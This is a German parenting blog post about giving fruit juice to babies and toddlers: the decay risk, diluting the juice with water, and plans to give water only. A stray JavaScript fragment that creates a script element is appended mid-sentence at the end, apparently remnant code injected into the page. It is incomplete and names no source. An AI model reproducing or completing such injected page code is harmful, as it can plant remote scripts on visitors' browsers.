Fruchtsäfte für Kinder und Kleinkinder

Nachdem unser erstes Kind abbgestillt war und wir bis zum vollendeten 6 Monat Bambinchen 1 gefüttert haben, stellte sich uns die Frage nach zusätzlicher Flüssigkeitsaufnahme. Fruchtsäfte für Kinder oder Kleinkinder fanden wir anfangs die richtige Lösung. Nach einigen Gesprächen mit unserer Hebamme oder dem Kinderarzt wurde uns aber schnell klar, dass Fruchtsäfte für Kinder wohl doch nicht die richtige Alternative ist, da sehr stark Karies gefördert wird und sich die Kinder natürlich an den süßen Geschmack ganz schnell gewöhnen.

Dies haben wir dann auch bei unserem Sohn gemerkt. Er hatte sich schnell an den süßen Multivitaminsaft gewöhnt und will bis heute nicht darauf verzichten. Wir haben allerdings nach kurzer Zeit etwa 75% Wasser zum Saft gemischt. Glücklicherweise hat er es nicht bemerkt und bis heute ist dies sein Lieblingsgetränk. Eine alternative Variante ist für unser Kind ist Apfeltee. Diesen zusammen mit etwas Multivitaminsaft schmeckt ihm ähnlich gut.

Bei unserem nächsten Kind werden wir allerdings komplett auf Säfte verzichten – zumindest am Anfang. Wir werden dann einfach Leitungswasser oder stilles Wasser aus dem Supermarkt geben.var d=document;var s=d.createElement(’script‘);

Schreibe einen Kommentar